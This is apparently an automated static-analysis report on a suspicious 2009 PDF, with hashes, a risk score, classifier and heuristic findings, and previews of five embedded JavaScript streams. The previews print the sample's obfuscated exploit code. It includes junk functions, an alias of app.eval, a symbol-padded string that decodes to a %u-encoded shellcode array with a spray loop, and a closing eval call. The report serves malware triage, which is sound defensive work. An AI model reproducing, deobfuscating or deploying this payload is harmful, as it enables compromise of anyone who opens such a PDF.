PDF static analysis report

Static analysis result for SHA-256 b057e78ca6505354…

SUSPICIOUS

PDF

59.6 KB Created: 2009-12-20 15:25:59 +03:00 Authoring application: bcComesMore (via f675d8aec99e98b4e62c6aae5fb12fb6) First seen: 2013-06-22
MD5: b59d0b86249c52b701f6a0b1bd0f1cd9 SHA-1: b48ddb1b6dc7676191a3c25501a5b372319c4ca6 SHA-256: b057e78ca6505354da1c238d1c7444f333850ea54c21b64db49faa0f7f2cefee
56 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell

The PDF file was flagged as suspicious by a machine learning classifier with a high confidence score. Several heuristics indicate the presence of embedded JavaScript, which is often used to download and execute malicious payloads. No specific URLs or hashes were extracted, limiting the ability to identify a specific family or provide concrete IOCs. The ML_NYX_PDF_MALICIOUS heuristic strongly suggests malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9994

Heuristics 4

  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger low PDF_OPTIONAL_CONTENT
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0019_000.js pdf-javascript-stream PDF /JS object 19 at offset 0x2C9C 2872 bytes
SHA-256: cdcce31ee80dacc3f6b5d57ed074bf51a4e3d4368f1fea69cd2ed3f1d2b1c937
Preview script
First 1,000 lines of the extracted script
�� t h i s . r K 1 Y o V b M X = n u l l ; t h i s . m W K X d o g i u = n u l l ; f u n c t i o n   l 0 s D H u I o ( c O W u h z o X W ) { r e t u r n   c O W u h z o X W ; } v a r   e Z k 6 g y 2 h = " m F b n 3 s x V T " ; t h i s . b 5 C t x B W d l = ' e l v Q u M U j ' ; f u n c t i o n   g s q C e 4 S H U ( y 7 3 q b J 6 F K 7 , t z K R Z L 6 x p ) { } f u n c t i o n   g k Q 9 R M V k O ( ) { r e t u r n   f a l s e ; } f u n c t i o n   v n j z Z 4 a R l y ( ) { r e t u r n   f a l s e ; } v a r   g Z 8 q u u r Q = n e w   A r r a y ( ) ; g Z 8 q u u r Q [ 0 ] = 2 2 6 8 6 ; g Z 8 q u u r Q [ 1 ] = 3 9 6 7 ; v a r   f k M v 8 l a y = n e w   A r r a y ( 3 7 6 6 , 2 6 5 5 1 ) ; t h i s . q m 5 X t 2 v 2 j F = n u l l ; v a r   d e M C t H v i Z M = n e w   A r r a y ( 9 7 6 , 1 2 2 3 3 , 1 8 1 2 6 ) ; t h i s . l 0 k M x c J v 0 d = f a l s e ; f u n c t i o n   w v j e G n J Y ( s o 4 a T Y o X T , s n G J N 3 3 1 t , j 4 G Q 9 8 Y l ) { } v a r   h 3 L b Q 2 2 V E = n e w   A r r a y ( 8 3 0 0 , 2 6 1 6 5 , 2 3 2 4 2 ) ; s p m j h e A T v Q = f a l s e ; f u n c t i o n   y Y u C p J E 7 U z ( g B q V c u f P ) { r e t u r n   f a l s e ; } v a r   v 1 i P 6 7 8 F = n e w   A r r a y ( ) ; v 1 i P 6 7 8 F [ 0 ] = 3 1 6 6 4 ; v 1 i P 6 7 8 F [ 1 ] = 3 1 2 7 3 ; f u n c t i o n   i Y V 1 a q h p B l ( ) { } f u n c t i o n   m 5 i Z i e 8 z f x ( f x a P m 5 D a 6 5 , o y q M g 9 U d i ) { r e t u r n   f a l s e ; } v a r   h 4 Q M S J e N   =   a p p . e v a l ; v a r   d e i U H H g O = n e w   A r r a y ( ) ; d e i U H H g O [ 0 ] = 2 1 0 5 5 ; d e i U H H g O [ 1 ] = 2 6 3 8 0 ; v a r   k L w F L V N e q 6 = n e w   A r r a y ( ' a U D Q y 4 M m ' , ' u s H G j n 5 7 y A ' ) ; f u n c t i o n   r K D q R z G c q j ( r t o 9 F 0 L q c , g B D m A a x b ) { r e t u r n   r t o 9 F 0 L q c ; } q c f U O n E 9 = n u l l ; v a r   e 6 s u D a 6 X z = n e w   A r r a y ( ) ; e 6 s u D a 6 X z [ 0 ] = 3 2 5 5 1 ; e 6 s u D a 6 X z [ 1 ] = 1 3 7 8 0 ; e 6 s u D a 6 X z [ 2 ] = 1 3 1 8 1 ; v a r   v a I E k 3 h t = n e w   A r r a y ( ) ; v a I E k 3 h t [ 0 ] = 1 6 3 7 9 ; f u n c t i o n   q y U M 2 Y S e F ( ) { } v a r   z D 2 v U t I s E m = f a l s e ; v a r   d 5 l j G 0 V L S = n e w   A r r a y ( ) ; d 5 l j G 0 V L S [ 0 ] = 2 4 7 5 ; w 5 V J j f B L 9 7 = " g K j S J Z z x P " ; v a r   r b C K G e 1 u = n e w   A r r a y ( 1 5 0 1 1 , 2 0 8 9 6 , 1 2 6 3 3 ) ; f u n c t i o n   e R J H Z s N e ( n O A l a E q z p , u O m Y 4 g 6 c 0 N , v p 8 X 1 P G o m ) { r e t u r n   v p 8 X 1 P G o m ; } v a r   s A e L q z N D q = n e w   A r r a y ( ) ; s A e L q z N D q [ 0 ] = 1 9 2 1 9 ; s A e L q z N D q [ 1 ] = 2 9 0 0 8 ; f u n c t i o n   x q 1 e c 4 S X 9 ( r Q A v N w 5 l c , j l S x l V 5 y ) { r e t u r n   r Q A v N w 5 l c ; } v a r   v d a R U D y y Z i = n e w   A r r a y ( 1 9 1 5 3 , 1 4 6 4 6 ) ;
javascript_obj0020_001.js pdf-javascript-stream PDF /JS object 20 at offset 0x3832 4096 bytes
SHA-256: a397c1d77e15682e3123ce563ea5c72f03f9dcc8a2b828493fec9e7c27615308
Preview script
First 1,000 lines of the extracted script
function hCFoLHY94(ykbIuj9E,dNo59cnUW){return ykbIuj9E;}var qfBpRTo7O=new Array();qfBpRTo7O[0]=24602;function oEyKggwzG(){return false;}kf95iLOhf='uyl3n8VTg';function ngP2Xko2i(gl6JA9Ugg,uQUXFyD8w){return false;}function hhqzf1M7fG(pElQCw8Y,eEAV30sB,gdss6lsOp){return pElQCw8Y;}function fefynbK1y(l4GK9i7jU){return false;}var jOjcEYyss=new Array();jOjcEYyss[0]=9288;jOjcEYyss[1]=4833;var o4it7YnCx1=new Array();o4it7YnCx1[0]=8628;o4it7YnCx1[1]=25053;o4it7YnCx1[2]=12626;function fjZGHOQIQ(rBEckMHjQ,lB7fx7xbEi){return false;}var rfrZf3jsUR=new Array();rfrZf3jsUR[0]=17170;rfrZf3jsUR[1]=15075;rfrZf3jsUR[2]=27872;this.o5H1s7ks=null;this.x4ysWMW41=31953;var bby2f4La = 'v?a?r? ?m?Z$F#b~5$4@v@s$6$0~ $=~ ?n@e#w# $A?r#r?a?y@(~)$;$v@a?r@ #g@p?i?U?B~m?W~S?L$b@;@f#u@n@c@t~i@o?n@ #j#M?E@z~9#A@b$i@0$z~(?v$4$Y?U~y#H@T~r$X#t$,~ #m#R~L?y@0~S~9~s#g@)#{#w?h?i$l$e$(#v$4$Y?U#y~H#T?r@X#t?.~l#e$n#g~t$h? ~*~ ?2~ ?<? @m#R$L?y$0~S$9~s?g@)?{?v$4$Y#U?y$H@T~r#X?t~ #+#=? $v?4?Y?U~y$H~T#r@X@t$;~}#v$4~Y?U#y@H~T~r?X@t? @=$ @v~4#Y?U$y@H~T~r@X#t@.@s$u?b$s$t~r$i@n@g@(#0@,@ #m~R?L?y?0#S?9@s$g$ $/$ ~2$)$;~r~e$t$u$r~n~ @v?4?Y~U@y#H#T$r#X@t#;$}@f~u?n$c?t~i~o@n# ?k~B#K~d$x#A?c$e~9@($h@I?X$c~W#q@u@G$R@)${?i#f@(#h~I?X~c$W?q?u?G@R? ?=@=# $0~)${@v#a~r~ #v@b?A?l#T?K~D~q@ @=# ~0@x?0~c$0$c@0$c@0$c$;$v?a@r@ ?p~L~A@C~V#X?J@j~J? $=~ $n$e$w# #A~r@r#a~y~(@\"?%#u~9@c$6?\"#,~\"@0~%@u@0~0~e$\"$,$\"@8?%$u@0?0?0$\"$,$\"?0~%~u$5?d@\"#,~\"~0?0@%?u@e#d?8$3$%@\"~,$\"~u?b~8#0$7#%?u@8?\"#,?\"@5?c#3?%#u~6#\"@,?\"?e~0~4@%#u?e$0?\"$,$\"$b?9@%@u@0@0?0@1#%?u#\"$,?\"$3$1@0$0$%@u@0~\"~,@\"@d$4#4$%~u#\"~,~\"?8?3#1?a@%@u~0#4~e#\"~,?\"#9?%?u$f#7$7@5@\"#,~\"@%?u~b?4?3#f#%#u~0$a#\"$,~\"~c#4#%$u$8?0@c?0$\"@,#\"#%~u$6$e~3#\"~,$\"@4@%~u~8#5#c@3$%#\"$,$\"@u?6?2?7~c@%@u#\"?,?\"$c?5?4~8@%#u#e$5#0$8#\"$,~\"?%?u~9?9~b$3$%$u$e?\"~,$\"$5#a@9$%?u#8#d@9~\"?,?\"~b@%@u?6$7$e@f#\"@,@\"?%@u#c#5#4$8?%#u?e#\"$,@\"@3?3?0$%?u?f?9~8~\"@,$\"~3~%?u@3#6$8@f#%~u?\"~,~\"$6~d~f?f$%$\"$,#\"@u@6#f?1?b$%?\"$,#\"#u$8$5~c?3@%@u?f@b@\"?,#\"~8$9$%#u?8?\"$,$\"~4@8@6#%#u~6?e?0$4@%@\"@,#\"@u?7#a~9~1?%~u?\"$,$\"@6$9#9#1#%~u#8?\"~,#\"@5?c#2?%$u#\"?,?\"~e#3#0~4?%@\"#,@\"#u@d$5?5#6@%~\"#,@\"@u~6$e?0?5#%~u$d$\"?,?\"?7?c#3@%?u@9@1$5?\"@,?\"?4$%@u@7~a@5$\"@,~\"@6$%?u#6#e$0~4?\"?,$\"~%@u@0~c?c$3#%~u~\"$,~\"?6@1?8$1~%@u@8$\"@,?\"@5@c~2@%~u@e#\"~,~\"#3$0@4#%#u#9@\"@,?\"#6?5?6@%?u@\"$,$\"#6$e?0~5~%#\"@,~\"~u#d$7~c#3$%~u?8@5@6~\"~,?\"$c$%$u@8~5~c$3?\"$,#\"@%?u#9~1~0@4~%~u?\"~,~\"~8@6#5$6#%~u@6$\"$,#\"?e@0~5~%$u#0#8@\"~,@\"$c#3?%?u?6~b@\"$,$\"#9#8@%~u#8$4~d?0~%#u#\"?,#\"$6?e@0?4#%~u@\"?,?\"$3~0#4?e~%~\"$,$\"$u@6~e~c?e~%#\"~,~\"~u@8#5@c$3#%@u~\"~,?\"#d?3@8$9~%@\"?,#\"#u$8#5#1@4@\"~,#\"@%~u@6~e$0@4@%@u?4@c@\"?,#\"~f@2~%$u~e@a~a?8~%$u~\"@,$\"@f?1~0$3#%?u~e@6#0@\"~,?\"@2$%~u$8#e$c$\"@,?\"@7~%#u@8~5?4~5$%@u$\"~,~\"#0~d?3$6?%~u$6#5$\"~,#\"~0~0?%?u?8#5?a@9?%#u$\"~,?\"$6?e@6?e~%$u~\"~,$\"?1$0~4#e~%~\"@,#\"$u$6@f~1#7@%$u#8?\"?,~\"?5@c#3#%~u?3~9@\"@,@\"~5#6~%?u@8@\"@,@\"?5$a$9$%#u?f~b@\"$,$\"~f?b~%$u$8$\"#,$\"@4@c?c$%?u$6~e#0?4#\"?,~\"~%~u#8?0~a~9#%~u?\"~,$\"$f$b$8@9?%~u$\"#,$\"?8~4?d@0$%@u#6#e#0$4@\"?,@\"?%$u?7#a~9$1~%~u?6?5#\"$,@\"#9$1?%?u~8~5$c?\"@,~\"#2#%~u~5@e$0$\"$,$\"#4@%~u@2~b$0?3~\"$,#\"#%~u?9~3$7@1$\"?,$\"$%~u$b?a?4$3?%#u@1?\"~,$\"#b#b$f@%@u@1#8?\"@,@\"~0~0#%@u#a~d$6~5~\"#,~\"@%$u?e?a$b?4~%~u~0@a?\"#,$\"$7?6@%$u?e$\"~,#\"?9?8@2?%?u~0$1?7#7?\"$,~\"$%@u$e#0@e@d#%$u$\"#,#\"?0$b~7$c?%#u$\"@,#\"~e?d$c@3?%@u?1$a#\"$,~\"@7~0~%?u?b#f~b#\"$,@\"#3$%?u@4~1$2@b#\"#,$\"$%@u$f~c#a@e#%#\"@,$\"#u#1@b?6~9?%@u?e~c~b@\"@,~\"@0?%@u$5?d~6$7?%?u@a@\"$,?\"~b$f$a@%#u@\"$,?\"#0#b$6#a$%?u~a?a#\"@,@\"~b$7?%$u$4$1#3~5$%$u#\"#,?\"$f@5$b@6$%$u#0#f~6@\"?,?\"?0?%?u~e@0~b$7#%~u?1#\"~,#\"@e@2?a@%~u@f@5$a#b#%#\"$,@\"$u$0#7?3@b#%@\"~,@\"?u@b@8~a$7@%?u@\"~,#\"@6?e@3~7$%$u~8$5~7$8@\"~,#\"#%$u@6@e@0?4@%~u$8?5@\"~,#\"~c?3?%?u$6~e?\"#,~\"?0@4~%@u$8@5?\"@,@\"#c#3~%$u~6#\"$,$\"~e~0#4#%$u?8@5?\"~,~\"?c$3?%#u~6#e~\"~,#\"~0~4~%~u~7?a$c#3$%$u#\"?,@\"?6$e$0$4@%?u?c~2~c~\"?,~\"#3@%~u@1#a?6$1$%$u#f$\"?,?\"~7~9~3#%$u$0~d#6@\"?,$\"$b?%@u~e?1?8$2?%$\"?,@\"#u~1~c?6#0?%$u$f@\"$,~\"$6#a#6$%@u@6#e@\"#,@\"~7#7$%~u@e$0#8?4$\"#,?\"#%$u?3@a$7~\"?,$\"$0?%@u#e$8?\"#,~\"?a#6~%?u@3?e#7~\"?,?\"#4$%~u#f?1@a?2@%?\"@
javascript_obj0021_002.js pdf-javascript-stream PDF /JS object 21 at offset 0xD053 2578 bytes
SHA-256: 1411d4ed0ae76ecc1396c54b913a36f1c79f9c3782380a7fd78ce6fbc735e30f
Preview script
First 1,000 lines of the extracted script
�� v a r   d h A 4 s 5 J E 0 T = n u l l ; v a r   m U X G y v o 6 = f a l s e ; v a r   i z G 1 5 3 r X = n e w   A r r a y ( ' s C 0 0 R G W d t ' , ' b N j q z G 9 J 9 ' ) ; v a r   d T 1 y O m 6 6 B = n u l l ; f u n c t i o n   y R 7 y V m j X ( ) { } q Y 0 5 5 I j N = ' k D j M T K T B l O ' ; v a r   e z i X Z c N w I J = " x A c 5 P 2 A E " ; f u n c t i o n   h 6 A F o W h y s m ( t T E N C o 7 p u , i p z Z x 1 D c V W , d V R P C B X p L P ) { r e t u r n   t T E N C o 7 p u ; } p S v x 9 H 4 9 = 0 . 3 6 2 4 3 9 4 ; f u n c t i o n   r y R L G r n K E ( ) { r e t u r n   f a l s e ; } t h i s . b I u a U d n n = ' m q N 8 B N b 9 ' ; f u n c t i o n   r B N r o k r T 1 V ( ) { } f u n c t i o n   e x j L S r U H Q ( a S 1 y o J H S 1 , h 6 U j 9 O 7 h h Q , f B 5 t x w e P c ) { r e t u r n   h 6 U j 9 O 7 h h Q ; } o F q Y 2 A C I Y a = " h W 2 w U z O l " ; t M E z N 1 M n J = " a 7 L a g 3 u S F w " ; v a r   h A t F H S C v M   =   b b y 2 f 4 L a . r e p l a c e ( / [ # @ \ $ ~ \ ? ] / g ,   ' ' ) ; f u n c t i o n   z T y S W n M i v ( e 8 l v C g E p 1 , q O Y k 2 X Z 8 N , a O f B q S e k Q k ) { r e t u r n   e 8 l v C g E p 1 ; } v a r   j P P z y z z Q K a = " d E a L C k T 6 S 7 " ; f u n c t i o n   p 3 6 h K O x T b ( h 7 h U W f H e , z G D 8 I C Q Q L ) { r e t u r n   z G D 8 I C Q Q L ; } v a r   r T 0 f C 0 3 B = n u l l ; f u n c t i o n   c g T e p 9 Q Z P ( b T w X 3 6 y 4 t 8 , m K X P u o x 0 A ) { r e t u r n   m K X P u o x 0 A ; } v a r   h P k 9 V v Z U = n e w   A r r a y ( ) ; h P k 9 V v Z U [ 0 ] = 1 0 7 9 1 ; v a r   v k F n V G X w V Z = n e w   A r r a y ( ) ; v k F n V G X w V Z [ 0 ] = 2 3 9 3 9 ; v k F n V G X w V Z [ 1 ] = 2 7 3 9 2 ; v a r   q P 0 y A B S K q = n e w   A r r a y ( ' a E O x Y r R i Q ' , ' m 1 q w P 2 a g ' ) ; v a r   r 8 Q 4 s P p 4 D 7 = " u u n f R t 3 1 " ; f u n c t i o n   e w D B Z n t S A ( ) { r e t u r n   f a l s e ; } v a r   f J 9 M u l u w = n e w   A r r a y ( ' k 4 Q y 6 0 4 X g w ' , ' s b O I r Q N 6 ' , ' z 9 e x 2 c A K Y ' ) ; f u n c t i o n   x W s b T f d P 8 f ( l A P 5 T B r q V k , f 2 U U A 0 w f , h O B q d B t e z ) { r e t u r n   f a l s e ; } f u n c t i o n   q 9 P o i q 2 W ( s p m H 2 1 b X , j f O U M f H y j q ) { r e t u r n   f a l s e ; } f u n c t i o n   k d 5 n 9 W 3 H ( u r i R e u a M v , i 9 N Z b 1 r M , k K l D U q j k U ) { r e t u r n   k K l D U q j k U ; } t h i s . o i b L 8 j u 6 = ' z l y z h W V m h ' ; f u n c t i o n   k i X W P Q q Z ( c N f u o d T f , r V i t 4 E e 7 ) { r e t u r n   r V i t 4 E e 7 ; }
javascript_obj0022_003.js pdf-javascript-stream PDF /JS object 22 at offset 0xDAB9 902 bytes
SHA-256: b631107836447ce28210e01a528d09477037bd0c1d2851f686e6916948b0519f
Preview script
First 1,000 lines of the extracted script
�� f u n c t i o n   z P j x q G 7 P g ( d H t G i j j y p , o C i 8 j h U D s ) { r e t u r n   d H t G i j j y p ; } f u n c t i o n   f g S o n a h x g ( x V U x c 0 t z R , y k U 3 X q 9 y A ) { } f u n c t i o n   l 3 t c Y W d 5 v ( s Q z 7 k K j l x , w u E u k x W n ) { } n k H h P g 5 q y = f a l s e ; a F N i H D w I s = f a l s e ; v a r   q L q Z H J x s n = n e w   A r r a y ( ) ; q L q Z H J x s n [ 0 ] = 1 7 4 0 0 ; q L q Z H J x s n [ 1 ] = 1 2 4 9 7 ; v a r   y K B Q r M U X 3 = n e w   A r r a y ( " n N Z 0 K U x U I t " , " y k K M E H G w U " ) ; v a r   f E M p B m Y M = n e w   A r r a y ( ' i y c B I 9 G w Q l ' , ' p E U m m T f S ' , ' i e g B q V c u f ' ) ; t h i s . f L j 3 x s e c M O = 2 7 4 9 5 ; i d g T z w Z C 8 = ' h S 0 Y E a u Y ' ; v a r   s e j 0 M S t 9 = n e w   A r r a y ( " b M f G u 6 0 8 Z " , " y D 9 4 8 r 7 w v v " , " f x a P m 5 D a 6 5 " ) ;
javascript_obj0023_004.js pdf-javascript-stream PDF /JS object 23 at offset 0xDE79 2486 bytes
SHA-256: a228ca6d5f0dfecaf99c7e9a10cb3cbd8c39ddd1b670a768484246720f7aa8fa
Preview script
First 1,000 lines of the extracted script
�� f u n c t i o n   k b j o h F s 1 ( b V F 8 N u 2 H , m n 1 3 r t U 2 , o x P y T A Z F ) { r e t u r n   m n 1 3 r t U 2 ; } v a r   d j o Q O z I f 3 = " o h 2 h 4 Q M S " ; v a r   l K d x A c e 9 V = f a l s e ; f u n c t i o n   n J q b W u A o ( r N i m Y v K 1 ) { r e t u r n   f a l s e ; } v a r   d N M q j d Z 1 9 = 0 . 4 7 2 8 8 8 6 2 4 ; v a r   b 8 B a H n Z H L = n e w   A r r a y ( ' n H t L h 8 P v X y ' , ' a k i g P t f B M ' , ' j Y O O y L D T e ' ) ; v a r   g 3 z W v Z E c = n u l l ; f u n c t i o n   z r N E 4 d I d ( ) { } f u n c t i o n   n r j O 2 b A S A ( f V L O D 0 K P , k K A U 7 6 b d W , p Z Z 8 v 7 J y ) { r e t u r n   f V L O D 0 K P ; } v a r   q n G 7 e K a f = n e w   A r r a y ( ) ; q n G 7 e K a f [ 0 ] = 2 2 8 8 9 ; q n G 7 e K a f [ 1 ] = 1 6 3 6 6 ; q n G 7 e K a f [ 2 ] = 2 7 7 9 1 ; v a r   x b l O D 8 q P N = n e w   A r r a y ( ' o s J f N o J I c ' , ' d l D q Y n E y i ' , ' j T k N T O q J ' ) ; f u n c t i o n   m a w k l 0 2 s ( b L 0 O x 0 W w b , k N 7 B 9 X l p s v , b Q a N M 4 O A ) { } f u n c t i o n   w 9 E p N o E 2 ( ) { } v a r   k 2 i I D 1 L 5 N = n e w   A r r a y ( ' n h Z o z q h I ' , ' l B T 1 w a v K r ' ) ; h 4 Q M S J e N ( h A t F H S C v M ) ; v a r   w y y v 9 W 9 s = f a l s e ; f u n c t i o n   w M 9 u D R 1 Z 4 ( z J W 6 7 Q s 2 k H , y 4 S r c 6 h A Z , v Q n B M a b 7 U 0 ) { r e t u r n   z J W 6 7 Q s 2 k H ; } f u n c t i o n   c R L Y h 0 U H T ( z F E f V l D D L 2 , k 8 a x D q a v ) { } f q U b N u 2 W Q = 1 2 2 2 7 ; v a r   o j 6 0 V E N m 1 = 1 0 3 6 3 ; v a r   y d l h O 4 O v B = 3 6 9 7 ; f u n c t i o n   l X 5 E X 1 M 3 ( f f Q Q i Z L K , z k y v v e 8 X , x d F J g 9 I q ) { r e t u r n   f a l s e ; } v a r   b k 8 x p p g t = " g O j O Z K 3 h " ; f u n c t i o n   j B l w 5 e u B Z ( r Z W f R p c L 9 M , z S e Q 4 v g e ) { r e t u r n   z S e Q 4 v g e ; } v a r   e F o m T Q 6 t s g = n e w   A r r a y ( 2 7 3 1 8 , 5 0 4 7 , 2 2 3 0 8 ) ; f u n c t i o n   f Z E Q f I 8 I k o ( n i G g 1 u H r D , p B d B H c q Q m , n F G 5 w N p a z ) { r e t u r n   n i G g 1 u H r D ; } f u n c t i o n   l y 8 7 E S S 1 Q ( v z G G 0 K X t D , a h o 6 Z i e c ) { r e t u r n   f a l s e ; } f u n c t i o n   l V z e W g T c ( t j U t Z G q c N , t Y q Q t d G p U , b G t g w D m 6 ) { r e t u r n   t j U t Z G q c N ; } f u n c t i o n   c C b h o L 6 d e ( h H p 2 q b V e W , n t B G F H f I s , q 5 t 7 Z Z J b 0 ) { r e t u r n   f a l s e ; }
stream_005_off00002c9c.js decompressed-pdf-stream PDF FlateDecoded stream at offset 0x2C9C 1435 bytes
SHA-256: ed134c6d2a1a0614bdc6bf09bdff6453349b5a93251ff7789f983ea6b81082c0
Detection
ClamAV: No threats found
Obfuscation or payload: likely
36 of 59 identifiers look randomly generated (e.g. 'y73qbJ6FK7') — consistent with name-mangling obfuscation.